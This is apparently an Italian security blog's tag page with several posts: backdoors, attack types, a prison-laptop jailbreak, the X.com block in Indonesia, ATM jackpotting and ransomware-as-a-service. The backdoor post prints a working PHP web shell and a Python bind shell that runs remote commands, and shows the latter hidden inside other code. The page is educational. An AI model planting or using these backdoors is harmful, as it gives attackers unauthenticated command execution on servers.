Tag: Mondo Sicurezza 👁

Che cos’è una backdoor
Una backdoor è un metodo segreto per ottenere accesso a un sistema, un’applicazione o una rete, bypassando le normali misure di sicurezza. Le backdoor possono essere installate da sviluppatori con intenzioni maligne, da cybercriminali o persino da attori statali per mantenere l’accesso ai sistemi compromessi.

Esempi pratici di backdoor
1. Backdoor su un server web:
  - Un attaccante compromette un server web e carica uno script PHP che gli consente di eseguire comandi arbitrari sul server.
2. Backdoor in un’applicazione:
  - Un’applicazione scaricata da una fonte non affidabile contiene codice nascosto che permette a un attaccante di controllare il computer dell’utente.
3. Backdoor hardware:
  - Chip o componenti di un dispositivo che contengono codice nascosto che può essere attivato per fornire accesso remoto o per compromettere la sicurezza del dispositivo.
4. Backdoor in software di rete:
  - Un software di gestione della rete che include una funzione nascosta per accedere a tutti i dispositivi gestiti da quel software.
5. Trojan horse:
  - Un programma apparentemente innocuo che contiene una backdoor nascosta che si attiva dopo l’installazione.
Creare una backdoor in PHP

Attenzione: Questo esempio è solo a scopo educativo per comprendere come funzionano le backdoor. Non deve essere utilizzato per scopi illegali o non etici.

Un semplice script PHP che funge da backdoor potrebbe essere così:

<?php
if(isset($_GET[‘cmd’])) {
system($_GET[‘cmd’]);
}
?>

Questo script prende un comando passato via URL e lo esegue sul server. Ad esempio, http://example.com/backdoor.php?cmd=ls eseguirà il comando ls sul server. Chiaro che, in questa veste del tutto ipotetica, chiunque può eseguire comandi mediante la manipolazione di un URL, e senza essere nemmeno autenticato!

Creare una backdoor in Python

Analogamente, un semplice script Python che funge da backdoor potrebbe essere:
import socket import subprocess def backdoor_example(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', 9999)) s.listen(1) conn, addr = s.accept() while True: cmd = conn.recv(1024) if cmd: proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) output = proc.stdout.read() + proc.stderr.read() conn.send(output) conn.close() if __name__ == "__main__": # ..... # ..... # ..... # da qualche parte nel codice: backdoor_example() # ..... # ..... # .....

Questo script apre una porta (9999) e ascolta i comandi inviati a quella porta, eseguendoli e inviando indietro l’output. Può essere chiaramente usata sia a scopo benefico che per usi malevoli.

Avviso

Implementare o utilizzare backdoor può essere illegale e non etico. Questi esempi sono forniti esclusivamente per scopi educativi per comprendere la natura e i rischi associati alle backdoor. È importante utilizzare le proprie competenze tecniche in modo responsabile e legale. Se scopri una backdoor o sospetti la presenza di una backdoor nel tuo sistema, segnala immediatamente l’incidente alle autorità competenti e ai responsabili della sicurezza informatica.
16/07/2024
Attacchi informatici: cosa sono e in cosa consistono
Gli attacchi informatici rappresentano una minaccia sempre crescente nel mondo digitale odierno. Esistono diverse tipologie di attacchi, ognuna con obiettivi e metodi distinti.

Il concetto di primo attacco informatico è difficile da definire in modo preciso, in quanto l’informatica ha una lunga storia di sviluppo e i primi casi di hacking e attività maliziose risalgono agli anni ’60 e ’70, quando i computer stavano diventando sempre più diffusi. Uno dei primi e più noti attacchi informatici è avvenuto nel 1982, quando un ragazzo di nome Kevin Mitnick ha violato il sistema informatico della Digital Equipment Corporation (DEC) per accedere ai loro sistemi e ai codici sorgente del software. Questo è uno dei primi casi documentati di hacking su larga scala, e ha contribuito a porre l’attenzione sui problemi di sicurezza informatica.

Tuttavia è importante notare che ci sono stati casi di hacking e attività informatiche maliziose anche prima di questo evento, ma la storia precisa del “primo attacco informatico” è difficile da tracciare a causa della natura relativamente informale e sperimentale dei primi anni dell’informatica.

Tipologie di attacco informatico

Vediamo di seguito una panoramica delle categorie principali di attacchi.

Malware/Ransomware: Questa categoria comprende una vasta gamma di software dannosi progettati per danneggiare o compromettere un sistema informatico. Tra i tipi comuni di malware ci sono virus, worm, trojan, ransomware e spyware. Ogni tipo di malware ha scopi e comportamenti specifici, come la distruzione dei dati, il furto di informazioni sensibili o il blocco dell’accesso ai file fino al pagamento di un riscatto. Questi attacchi cifrano i dati di un sistema informatico e richiedono un pagamento di un riscatto per ripristinare l’accesso ai file. Il ransomware può diffondersi attraverso e-mail di phishing, exploit del software o altri metodi, e può causare danni finanziari significativi e interruzioni delle attività.

Attacchi di phishing: Gli attacchi di phishing coinvolgono l’invio di e-mail, messaggi di testo o altri messaggi che sembrano provenire da fonti legittime al fine di ingannare le persone affinché divulghino informazioni personali o finanziarie. I truffatori possono impersonare istituzioni finanziarie, aziende o altre organizzazioni per ottenere accesso non autorizzato a account o dati sensibili.

Attacchi di ingegneria sociale: Questi attacchi si basano sull’inganno e sulla manipolazione psicologica per ottenere l’accesso non autorizzato a informazioni riservate o per convincere le persone a compiere azioni dannose. Gli attaccanti possono fingere di essere persone fidate, fare pressioni emotive o creare situazioni di emergenza per ottenere ciò che vogliono.

Attacchi di Denial of Service (DoS): Questi attacchi mirano a sovraccaricare i server o le risorse di rete di un sistema al fine di renderlo inaccessibile agli utenti legittimi. Gli attaccanti possono inviare una grande quantità di traffico dannoso o sfruttare vulnerabilità nei protocolli di rete per interrompere i servizi online.

Attacchi di furto di dati: Gli attacchi di furto di dati mirano a ottenere accesso non autorizzato a informazioni sensibili come dati personali, informazioni finanziarie o segreti commerciali. Gli attaccanti possono utilizzare tecniche come il cracking delle password, l’exploit delle vulnerabilità del software o l’intercettazione delle comunicazioni per ottenere i dati desiderati. In alcuni casi possono verificarsi casi di pharming nel momento in cui si altera l’hardware di un dispositivo a scopo malevolo.

Attacchi di spoofing: Questi attacchi coinvolgono la falsificazione dell’identità o dell’origine di un’entità o di una comunicazione digitale. Ad esempio, gli attaccanti possono falsificare l’indirizzo IP di un computer o l’indirizzo email di un mittente per eludere i controlli di sicurezza o ingannare gli utenti.

Questi sono solo alcuni esempi delle molte forme di attacchi informatici che possono minacciare la sicurezza e la privacy dei sistemi informatici e degli utenti. La comprensione di queste minacce rimane fondamentale per adottare misure efficaci di protezione e prevenzione.
09/05/2024
Un utente Twitter ha comprato un prison laptop solo per crackarlo

Da qualche ora sta spopolando su Twitter/X l’utente zephray_wenting, che in un momento di nerdismo puro ha deciso di acquistare un singolare laptop eBay, denominato “prison laptop”, con il semplice e deliberato scopo di provare a farne il jailbreak (ovvero togliere qualsiasi tipo di protezione al suo interno). In tutto questo sarà implicita la motivazione che l’ha spinto a farlo, ovvero promuovere una cultura informatica free e open source.

Bought a prison laptop on eBay. Thought it should be just some generic laptop with a clear shell, turns out it's actually a bit more than that. pic.twitter.com/8jOrTkw4jJ

— Wenting (@zephray_wenting) February 25, 2024

Per impostazione predefinita, un laptop nella variante prison (prison laptop, letteralmente un computer imprigionato) non possiede un sistema operativo. Basterebbe installarne uno, penserete voi, ma i costruttori di questo laptop artigianale si sono scatenati: l’hanno progettato come un computer docked, ovvero non separabile nelle sue componenti, dotato di processore Intel Celeron N3450 a 2,2 GHz, ovviamente non aggiornabile e privo di spazio di archiviazione, distribuito per scopi educational (per chi fosse interessato) dalla originalissima Justice Tech Solutions.

Da quello che riferisce l’utente, che ha dettagliato il procedimento sul proprio blog, non era possibile effettuare il cambio del BIOS all’avvio perché ogni volta che viene meno l’alimentazione si ripristina in automatico, e di USB manco a parlarne. L’unica cosa che è possibile fare è inserire una password, non comunicata al compratore ovviamente: ed è qui che inizia una sorta di originale “caccia al tesoro” informatica.

Le operazioni che sono state effettuate nell’ordine sono state quindi quella di dumpare la password in esadecimale, criptata all’interno della RAM. La cosa più semplice che si può fare in questi casi è quella di eliminarla fisicamente con il tasto CANC, ma la difficoltà che viene presentata in termini di hardware e che lo spegnimento resetta in automatico il BIOS allo stato iniziale. Motivo per cui, come si diceva poco fa, la password deve essere inserita per forza, e già questo scoraggerebbe molti hacker in erba. L’unica possibilità è quella di imporre al BIOS di far partire un sistema operativo da un disco esterno, ma anche qui ci si scontra con un ulteriore problema: il sistema operativo infatti viene caricato soltanto da alcuni dispositivi HDD in whitelist, per cui non va bene collegare un disco qualsiasi. A quel punto l’unica possibilità è quella di creare un ponte elettrico sulla porta USB (ovviamente montata in modo artigianale sulla scheda madre) e avviare una versione di Linux portable. Per far funzionare il disco, inoltre, è stato effettuata una modifica a livello assemblare sulla procedura di riconoscimento del disco stesso, in collaborazione con un altro utente.

Il computer per impostazione interna non accetta tutti i tipi di hard disk. Fonte: https://threadreaderapp.com/thread/1761548861896606014.html

La fase di dump iniziale della password, criptata all’interno della RAM. Fonte: https://threadreaderapp.com/thread/1761548861896606014.html

Come si presentava un prison laptop al momento dell’acquisto. Fonte: https://threadreaderapp.com/thread/1761548861896606014.html

Superato qualche altro piccolo ostacolo di configurazione il PC laptop era finalmente pronto all’uso, e tra le altre cose è stata installata una mod del videogioco classico Doom. L’impresa è tra le notizie più lette nel settore delle ultime ore e, per come è andata, non c’è da meravigliarsene.

(fonte per testo e immagini)

25/02/2024
Elon Musk sta trasformando Twitter in X.com (e in Indonesia è stato bloccato)

Dopo aver ribrandizzato Twitter come “X” questa settimana, il miliardario proprietario del sito Elon Musk ha reindirizzato x.com in modo che i visitatori vengano inviati a Twitter. Si prevede che x.com diventerà la nuova identità online del sito di social media. Ma per il momento in alcuni paesi dell’Asia non funzionerà facilmente.

Secondo Confident_reader su Reddit – se non sapete cos’è, correte a informarvi – Elon Musk ha messo una croce su Twitter. Letteralmente. Il suo recentissimo rebrand di Twitter, che è diventato X ma solo in parte (non tutto il sito e non tutta l’app è stata aggiornata in modo uniforme) ed ha messo fine alla vecchia gestione (salvo sorprese last minute), ha finito per causare un singolare problema in Indonesia. Lo stesso che The Telegraph ha definito rebranding caotico, all’insegna del disordine, delle cose che sembrano fatte a capriccio, senza una direzione lineare, che tanto sta facendo rimpiangere la vecchia versione dell’app a miriadi di instancabili utilizzatori (quelli che sono rimasti a bordo, ovviamente).

Di fatto, a causa di una legge anti-pornografia promossa in Indonesia, X.com (il redirect che porta a Twitter.com, ad oggi, e che potrebbe in teoria diventare il nuovo dominio di Twitter.com in futuro, con una serie di potenziali problemi di compatibilità non da poco) non è più accessibile perchè viene bloccato dai firewall. Cosa che sembra potersi aggirare con una classicissima VPN, non è questo il problema: ma effettivamente X.com ricorda un po’ troppo XXX, che è l’acronimo dietro il quale, storicamente, si indicano siti e materiale per adulti.

La caotica ristrutturazione di Twitter da parte di Elon Musk ha avuto pertanto un altro ostacolo dopo che è emerso che il suo nuovo dominio web “X” è stato bloccato in Indonesia e alcune parti dell’Asia a causa di discusse leggi anti-pornografia. L’Indonesia ha impedito l’accesso a x.com ai suoi 270 milioni di abitanti martedì scorso, ad esempio. Le autorità del paese a maggioranza musulmana hanno affermato che il dominio aveva una storia di collegamenti diretti e indiretti con il gioco d’azzardo e la pornografia. Il sito x.com era rimasto inutilizzato durante gli ultimi anni, per la cronaca, ed era stato ancora prima una vetrina per i servizi di PayPal ed eBay rivolti agli operatori di negozi online, non collegati al gioco d’azzardo o alla pornografia.

Foto di Marcin Paśnicki da Pixabay

28/07/2023
Che cos’è il jackpotting (malware negli ATM bancomat)

Spesso si tende a pensare che gli attacchi informatici riguardino solo i computer domestici o gli smartphone, ma la realtà è molto più variegata: questa volta raccontiamo di un recente caso avvenuto ad un ATM di una banca americana, la Citizen’s Bank. Quattro persone sono state accusate di frode in merito alla manipolazione di un ATM e di furto di circa 50,000 dollari.

L’attacco informatico è noto come “jackpotting” e viene solitamente eseguito da truffatori travestiti da tecnici addetti alla manutenzione, i quali installano prima un software malevolo nel bancomat e poi, in un secondo momento, fanno commettere il furto ad altri due collaboratori. Si tratta di una tecnica che è nota almeno dal 2010, come mostrato in questo video tratto dalla conferenza di sicurezza informatica nota come Black Hat USA.

Durante il furto è stata immediatamente rilevata l’anomalia, e sembrerebbe che l’emissione di 40 richieste da 20 dollari ciascuna sia stata finalizzata proprio mentre i due venivano scoperti a prelevare il denaro; attualmente rischiano fino a 30 anni di carcere. Tra il materiale utilizzato per commettere il crimine risultano cacciaviti, cavi, fili, un dispositivo elettronico non specificato, che sono stato riconosciuti come necessari a commetterlo. A quanto pare è stato rilevato un caso simile anche qualche giorno prima, per cui potrebbe non essere l’ultimo: sono noti casi analoghi in Asia, Messico e anche in Europa, con quasi un milione di dollari sottratti solo negli Stati Uniti con questa tecnica.

In attesa di misure migliorative della sicurezza sugli ATM, le autorità e gli esperti del settore raccomandano ovviamente agli impiegati addetti agli ATM la massima cautela nelle procedure usuali, al fine di evitare attacchi di questo tipo in futuro (fonte).

06/02/2018
Il ransomware scalabile, venduto come servizio SaaS

Abbiamo parlato in più occasioni di quella che sembra essere diventata la nuova minaccia in ambito computer e telefoni, ovvero i ransomware: dei particolari tipi di malware che criptano i file della vittima rendendo il tutto non utilizzabile ed impostando una chiave crittografica molto forte per sbloccare il tutto (solitamente mediante riscatto). Molte aziende, istituzioni e addirittura ospedali sono stati colpiti da infezioni di questo tipo, con conseguenze molto spesso devastanti per il business e le attività degli enti stessi, e con paralisi completa o parziale delle attività che si possono svolgere.

Il ransomware, inaspettatamente per alcuni, sta finendo per spalancare le porte a nuove tipologie di business: un vero e proprio mercato nero dei ransomware, che spesso si sviluppa anche sui binari di DarkNet. La cosa allarmante, in particolare, è che grazie a questi servizi (Ransomware as a Service, RaaS) vengono messe a disposizione, direttamente dal dark web, delle interfaccie di amministrazione che consentono di infettare computer e reti altrui anche con un minimo di conoscenza tecnica, aprendo così un proprio business criminale in pochi click.

Non sarà facile contrastare questo genere di soluzioni, e con l’introduzione di servizi del genere (di sostanziale “rivendita” o reselling) la diffusione sarà sempre più marcata e difficile da contrastare. Restano valide le indicazioni di sempre: premunirsi di backup sconnessi da internet, potenziare la protezione della propria rete informatica e dotarsi di firewall, antivirus e software di protezione idonei a tutti i livelli.

19/04/2017